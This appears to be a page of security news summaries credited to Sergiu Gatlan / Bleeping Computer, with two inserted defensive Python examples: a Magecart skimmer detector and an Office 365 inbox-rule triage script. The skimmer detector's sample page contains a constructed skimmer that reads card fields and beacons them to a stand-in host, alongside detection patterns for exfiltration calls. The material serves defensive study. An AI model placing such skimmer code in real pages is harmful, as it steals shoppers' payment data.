Search Results for “Sergiu Gatlan”


May 16, 2019
Sergiu Gatlan / Bleeping Computer

Hackers Infected Forbes’ Website With Credit Card Data-Stealing Magecart Malware

Hackers injected a Magecart credit card skimming script into Forbes’ subscription website, Bad Packets Report co-founder Troy Mursch discovered. The script siphons card numbers, expiration dates, and CVV/CVC verification codes, as well as customers’ names, addresses, phone numbers, and email addresses, to a server controlled by the attackers. While the script could still be found on the forbesmagazine.com website at the time of the report, the domain the attackers used to collect the stolen payment data has been taken down via Freenom’s abuse API, which allows malicious domains to be suspended immediately.

May 13, 2019
Sergiu Gatlan / Bleeping Computer

Misconfigured Elasticsearch Database Exposed Sensitive Records on Around 4 Million Panamanian Health Care Patients Reflecting Virtually All of the Country’s Citizens

A misconfigured Elasticsearch cluster exposed 3,427,396 records labeled “patient” containing sensitive personal information on Panama citizens, together with another 468,086 records labeled “test patient”, security researcher Bob Diachenko discovered. The roughly 3.4 million patient records contained a wide variety of information, ranging from full names, dates of birth, national ID numbers, and addresses to medical insurance numbers, email addresses, and phone numbers. Assuming the database does not contain a substantial number of duplicates, the 3.9 million records combined could represent roughly 95% of Panama’s 4.1 million population. Diachenko notified CERT Panama of the exposure, and the database was secured within 48 hours.

May 9, 2019
Sergiu Gatlan / Bleeping Computer

Unprotected MongoDB Discovered Containing Wealth of Personally Identifiable Information in 275 Million Records on Indian Citizens

An unprotected, publicly indexed MongoDB database hosted on Amazon Web Services (AWS) containing 275,265,298 records with personally identifiable information (PII) on Indian citizens was discovered by security researcher Bob Diachenko on May 1. The database, first indexed on April 23, 2019, revealed a wealth of information including names, email addresses, gender, education level and area of specialization, professional skills and functional area, mobile phone numbers, employment history and current employer, dates of birth, and current salary. The owner of the database is unknown; Diachenko notified India’s CERT team of the incident. The database remained open and searchable until May 8, when it was wiped by a hacker group known as ‘Unistellar’.

May 4, 2019
Sergiu Gatlan / Bleeping Computer

‘Mirrorthief’ Group Launched Credit-Card Skimming Magecart Attacks Against 201 U.S. and Canadian Online Campus Stores

Checkout pages of at least 201 U.S. and Canadian online campus stores powered by the PrismWeb e-commerce platform were injected with a JavaScript-based payment card skimmer as part of ongoing Magecart attacks, according to researchers at Trend Micro. The attacks began on April 14, when the sites were injected with the malicious skimming script, which scrapes credit card information as well as personal details entered on the payment page. PrismRBS, which operates the college bookstore-specific PrismWeb platform, said that once it learned of the attack on April 26 it took steps to immediately halt it, inform bookstore customers, and begin working with law enforcement to investigate the matter. Trend Micro cannot associate the attackers with any previously known Magecart group, so it is labeling the campus store attackers “Mirrorthief” after the Trojan used in the attacks, Trojan.JS.MIRRORTHIEF.AA.
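Both the Forbes and the campus-store items describe the same mechanic: a script on the checkout page reads the card fields and sends them to a host the site owner never approved. As an added example (not code from the original page, Bad Packets, Trend Micro or PrismRBS), the Python below runs that heuristic over a checkout page’s HTML: it collects external script sources and inline script bodies, and flags any inline script that touches card fields, uses a network-send primitive, and references a host outside an allowlist. The sample HTML, the field names and the domains (cdn.shop.example, stats.example-cdn.invalid) are constructed for illustration; a real deployment would feed it the live page and its own allowlist.

```python
"""Heuristic scan of a checkout page for Magecart-style skimmer indicators.

Added example, not code from the original page or from any research team it
cites. The sample page and every domain in it are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer has to hook (assumption: the checkout form uses names like these).
CARD_FIELD_RE = re.compile(
    r"(card[-_ ]?number|cvv|cvc|exp(?:ir)?[-_ ]?(?:date|month|year)|ccnum)", re.I)
# Primitives inline JavaScript uses to push data off the page.
EXFIL_RE = re.compile(
    r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=|WebSocket)", re.I)
# Absolute URLs embedded in script text; group 1 is the host.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> values and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser delivers <script> content as raw data, possibly in chunks.
        if self._in_script:
            self.inline[-1] += data


def _host(url):
    return (urlparse(url).hostname or "").lower()


def find_skimmer_indicators(html, allowed_hosts):
    """Return a list of (kind, detail) findings for the scripts on a page."""
    allowed = {h.lower() for h in allowed_hosts}
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = _host(src)           # relative src has no host and is skipped
        if host and host not in allowed:
            findings.append(("external-script", host))
    for body in parser.inline:
        reads_card = bool(CARD_FIELD_RE.search(body))
        sends = bool(EXFIL_RE.search(body))
        hosts = {m.group(1).lower() for m in URL_RE.finditer(body)}
        foreign = sorted(h for h in hosts if h not in allowed)
        if reads_card and sends and foreign:
            findings.append(("inline-skimmer", ",".join(foreign)))
        elif reads_card and sends:
            findings.append(("inline-suspicious", "card fields + network send, no foreign host"))
    return findings


# Constructed checkout page: one legitimate script plus an injected skimmer stand-in.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment">
  <input name="card_number"><input name="cvv"><input name="exp_date">
</form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    var d = {n: document.querySelector('[name=card_number]').value,
             c: document.querySelector('[name=cvv]').value};
    new Image().src = 'https://stats.example-cdn.invalid/g.gif?d=' + btoa(JSON.stringify(d));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in find_skimmer_indicators(SAMPLE_CHECKOUT_HTML, ["cdn.shop.example"]):
        print(kind, detail)
```

A static scan like this only sees what is in the served HTML; a skimmer loaded from an allowed-looking CDN, assembled at runtime, or heavily obfuscated needs the rendered page and its outbound requests inspected instead. The check is best paired with a Content-Security-Policy that restricts `script-src` and `connect-src` to the hosts the checkout actually needs, which blocks the exfiltration step regardless of how the script got there.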

May 2, 2019
Sergiu Gatlan / Bleeping Computer

Around 29% of Organizations Had Their Office 365 Accounts Compromised by Hackers in March, Barracuda Networks Says

Around 29 percent of organizations had their Office 365 accounts compromised by hackers in March 2019, according to a recent analysis of account-takeover attacks against the customers of security firm Barracuda Networks. More than 1.5 million malicious and spam emails were sent from the hijacked Office 365 accounts in that month. In 34 percent of the nearly 4,000 compromised accounts, the attackers added malicious mailbox rules to hide their activity and deleted the malvertising, phishing, and spam emails sent from the account. The attackers used a combination of “brand impersonation, social engineering, and phishing,” impersonating high-profile companies such as Microsoft to persuade victims to visit phishing landing pages.
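The mailbox rules mentioned above are one of the few durable post-compromise indicators a defender can hunt for: the attacker needs them to keep bounce messages, “is this really you?” replies and security alerts out of the victim’s sight. As an added example, not code from the original page or from Barracuda, the Python below triages an exported list of inbox rules using the property names Exchange Online’s Get-InboxRule cmdlet returns (Name, Enabled, SubjectContainsWords, BodyContainsWords, DeleteMessage, MoveToFolder, MarkAsRead, ForwardTo, RedirectTo, ForwardAsAttachmentTo, MailboxOwnerId). The JSON sample, the mailbox addresses, the keyword list and the scoring weights are constructed; tune them to your tenant.

```python
"""Triage of Exchange Online inbox rules for attacker-added hiding rules.

Added example, not code from the original page or from Barracuda. Input is a
JSON array of rule objects carrying Get-InboxRule property names; the sample
rules, addresses and weights below are constructed.
"""
import json
import re

# Folders attackers use to bury messages the mailbox owner would otherwise notice.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                  "deleted items", "junk email", "archive", "notes"}
# Keywords a takeover rule filters on to suppress warnings, replies and payment traffic.
SUSPICIOUS_WORDS = re.compile(
    r"(password|hack|phish|suspicious|compromis|fraud|unusual sign|"
    r"security alert|helpdesk|invoice|payment|wire)", re.I)
# Attackers often name rules '.', ',' or leave them blank so they sink to the bottom of the list.
RULE_NAME_SUSPECT = re.compile(r"^(\s*$|[.,;])")


def _external_targets(rule, internal_domains):
    """Return forward/redirect recipients whose domain is not one of ours."""
    out = []
    for key in ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo"):
        for addr in rule.get(key) or []:
            if addr.rsplit("@", 1)[-1].lower() not in internal_domains:
                out.append(addr)
    return out


def score_rule(rule, internal_domains):
    """Return (score, reasons) for one rule; higher means more suspicious."""
    reasons = []
    if not rule.get("Enabled", True):
        return 0, reasons
    words = " ".join((rule.get("SubjectContainsWords") or []) +
                     (rule.get("BodyContainsWords") or []))
    # Get-InboxRule renders the target as "mailbox:\Folder"; keep only the folder name.
    folder = (rule.get("MoveToFolder") or "").rsplit("\\", 1)[-1].lower()
    if rule.get("DeleteMessage"):
        reasons.append("deletes matching mail")
    if folder in HIDING_FOLDERS:
        reasons.append(f"moves mail to hiding folder '{folder}'")
    if rule.get("MarkAsRead"):
        reasons.append("marks mail as read")
    keyword_hit = bool(SUSPICIOUS_WORDS.search(words))
    if keyword_hit:
        reasons.append(f"filters on takeover keywords: {words!r}")
    external = _external_targets(rule, internal_domains)
    if external:
        reasons.append("forwards externally to " + ", ".join(external))
    if RULE_NAME_SUSPECT.match(rule.get("Name", "")):
        reasons.append("rule name is punctuation/blank")
    # The classic pattern is hide + keyword filter; external forwarding is its own red flag.
    hides = any(r.startswith(("deletes", "moves", "marks")) for r in reasons)
    score = len(reasons) + (2 if hides and keyword_hit else 0) + (2 if external else 0)
    return score, reasons


def triage_inbox_rules(rules_json, internal_domains, threshold=3):
    """Parse exported rules and return [(mailbox, name, score, reasons)] at or above threshold."""
    internal = {d.lower() for d in internal_domains}
    hits = []
    for rule in json.loads(rules_json):
        score, reasons = score_rule(rule, internal)
        if score >= threshold:
            hits.append((rule.get("MailboxOwnerId", "?"), rule.get("Name", ""), score, reasons))
    return sorted(hits, key=lambda h: -h[2])


# Constructed export: two attacker-style rules and one benign one.
SAMPLE_RULES_JSON = json.dumps([
    {"MailboxOwnerId": "a.user@corp.example", "Name": ".", "Enabled": True,
     "SubjectContainsWords": ["password", "hacked", "phishing"],
     "DeleteMessage": True, "MarkAsRead": True},
    {"MailboxOwnerId": "a.user@corp.example", "Name": "Invoices", "Enabled": True,
     "SubjectContainsWords": ["invoice", "payment"],
     "MoveToFolder": "a.user@corp.example:\\RSS Feeds",
     "ForwardTo": ["collector@mail.example.invalid"]},
    {"MailboxOwnerId": "b.user@corp.example", "Name": "Newsletters", "Enabled": True,
     "FromAddressContainsWords": ["newsletter"],
     "MoveToFolder": "b.user@corp.example:\\Reading"},
])

if __name__ == "__main__":
    for mailbox, name, score, reasons in triage_inbox_rules(SAMPLE_RULES_JSON, ["corp.example"]):
        print(f"{mailbox} rule {name!r} score={score}: {'; '.join(reasons)}")
```

Run the export side with `Get-InboxRule -Mailbox <user> | ConvertTo-Json` per mailbox (or `Get-Mailbox | ForEach-Object { Get-InboxRule -Mailbox $_.Identity }` across the tenant) and feed the result to `triage_inbox_rules`. Review anything that scores, then remove the rule, reset the credential, revoke refresh tokens and check the unified audit log for the `New-InboxRule` / `Set-InboxRule` operation that created it, since the rule is evidence of the compromise, not the compromise itself.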

April 24, 2019
Sergiu Gatlan / Bleeping Computer

Actors Behind DNSpionage Add ‘Karkoff’ Malware for Remote Code Execution, Also Improve Target Selection, May Be Tied to OilRig Group

Researchers at Cisco Talos have discovered new evidence that the threat actors behind the DNSpionage campaign have added a reconnaissance phase that selectively chooses which targets to infect with malware, and are using new malware dubbed Karkoff that allows them to execute code remotely on compromised hosts. In the DNSpionage campaign, the threat actors built a new remote administration tool that supports both HTTP and DNS communication with the attackers’ command and control infrastructure. The researchers also found a weak link between the Iranian cyberespionage group OilRig, also known as APT34, and the DNSpionage actors.

March 18, 2020
Sergiu Gatlan / Bleeping Computer

NIST Releases Recommendations to Prevent Eavesdropping, Protect Privacy During Virtual Meetings Necessitated by COVID-19

The US National Institute of Standards and Technology (NIST) recommended several measures remote workers should take to prevent eavesdropping and protect their privacy during virtual meetings while working from home during the COVID-19 pandemic. NIST warns that “if virtual meetings are not set up correctly, former coworkers, disgruntled employees, or hackers might be able to eavesdrop.” Among the recommended measures are using the conferencing software’s built-in security features, requiring multi-factor authentication for meetings, limiting the reuse of meeting access codes, and enabling join notifications so that the host can quickly identify attendees who should not be present, along with a number of other considerations. NIST’s recommendations follow advice from DHS’s Cybersecurity and Infrastructure Security Agency (CISA) on securing VPNs.

Related: Infosecurity Magazine, New York Times, Tech Insider, Gadgets Now, CSO Online, Lowyat.NET, The Sun, Trusted Reviews, ZDNet Security, Techradar, TechUK, SANS, BitSight Security Ratings Blog, iPhone Hacks, Business Insider, Carbon Black, Professional Security Magazine, NIST

Infosecurity Magazine: Working from Home Policies and the Future of Cybersecurity
New York Times: Ahead of the Pack, How Microsoft Told Workers to Stay Home
Tech Insider: The Big 3 Detroit automakers and the UAW are joining forces to ensure worker safety as coronavirus threatens plant shutdowns (GM, F, FCAU)
Gadgets Now: Hackers eye workers from home in absence of secure networks
Gadgets NDTV: Coronavirus: Hackers Eye Workers From Home in Absence of Secure Networks
CSO Online: 8 key security considerations for protecting remote workers
Lowyat.NET: Working From Home? Here Are 6 Free Collaborative Tools To Help You Out
The Sun: Best apps for working from home and coronavirus self-isolation – Skype, Slack, Zoom, Hangouts, Discord, Trello and more
Trusted Reviews: Top tech hacks when working from home
ZDNet Security: Work from home on the cheap: Build a budget home office for under $300
Techradar: 5 things to consider when building your home office
TechUK: Strengthening cyber security when working from home
SANS: This is BIG – Please Help Secure Orgs Around the World (Literally) Due to COVID-19
BitSight Security Ratings Blog: Novel Coronavirus Brings New Challenges For Security Teams
iPhone Hacks: Apple Employees Struggling to Work from Home Due to the Company’s Tight Secrecy Rules
Business Insider: Apple’s culture of secrecy is making it hard for employees to work remotely during the coronavirus outbreak, report says (AAPL)
Carbon Black: Tips for Securing Remote Workers
Professional Security Magazine: Coronavirus and work from home
NIST: Preventing Eavesdropping and Protecting Privacy on Virtual Meetings


February 11, 2020
Sergiu Gatlan / Bleeping Computer

Emotet Now Features Wi-Fi Worm That Spreads to New Machines Connected to Nearby Insecure Wireless Networks

Researchers at Binary Defense recently discovered an Emotet Trojan sample that features a Wi-Fi worm module allowing the malware to spread to new victims connected to nearby insecure wireless networks. The new strain starts the spreading process by using wlanAPI.dll calls to enumerate the wireless networks within range of an already infected Wi-Fi-enabled computer, then attempts to brute-force the passwords of any that are protected. After connecting the compromised device to another wireless network, the malware looks for Windows devices with non-hidden shares and tries to brute-force the password of the Administrator account, and of every other user account it can enumerate, on those devices. Once it breaks into an account, the malware drops the worm payload. Emotet is considered one of the most dangerous malware strains in circulation; the Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert advising organizations to be on the lookout for it.

February 19, 2020
Sergiu Gatlan / Bleeping Computer

Fake ProtonVPN Website Spread AZORult Cryptocurrency-Stealing, Information-Grabbing Malware via Fake Installers

A fake ProtonVPN website delivered the AZORult information-stealing malware to potential victims in the form of counterfeit ProtonVPN installers starting in November 2019, according to researchers at Kaspersky Lab. ProtonVPN is a security-focused, open-source virtual private network (VPN) service developed and operated by Proton Technologies AG, the same Swiss company behind ProtonMail. The AZORult Trojan sells for around $100 on Russian underground forums and is also known to act as a downloader for other malware families when used in multi-stage campaigns. Once it infects a machine, it is designed to collect and deliver as much sensitive information as possible to its operators, from files, passwords, cookies, and browser history to cryptocurrency wallets and banking credentials. protonvpn[.]store, the website used to deliver the malicious fake ProtonVPN installers, was registered through a Russian registrar in November 2019. In this campaign, Kaspersky says, the AZORult Trojan steals cryptocurrency from locally available wallets (Electrum, Bitcoin, Ethereum, etc.), FTP logins and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), and credentials for WinSCP, the Pidgin messenger, and other applications.

March 5, 2020
Sergiu Gatlan / Bleeping Computer

Criminals Spread Malware Using Fake Security Certificate Warnings Displayed on Previously Compromised Sites

Cybercriminals are distributing malware using fake security certificate update prompts displayed on previously compromised websites, infecting potential victims with backdoors and Trojans via a malicious installer, researchers at Kaspersky Lab have discovered. The attackers display a fake “NET::ERR_CERT_OUT_OF_DATE” error message inside an iframe overlaid on the site’s actual content, asking visitors to install a security certificate so that their connection can proceed. The researchers found the earliest signs of this campaign dating to January 16, 2020, affecting a range of different kinds of sites. Victims who run the installer are infected with the Buerak Trojan downloader, which then downloads and installs additional malware onto the compromised computer.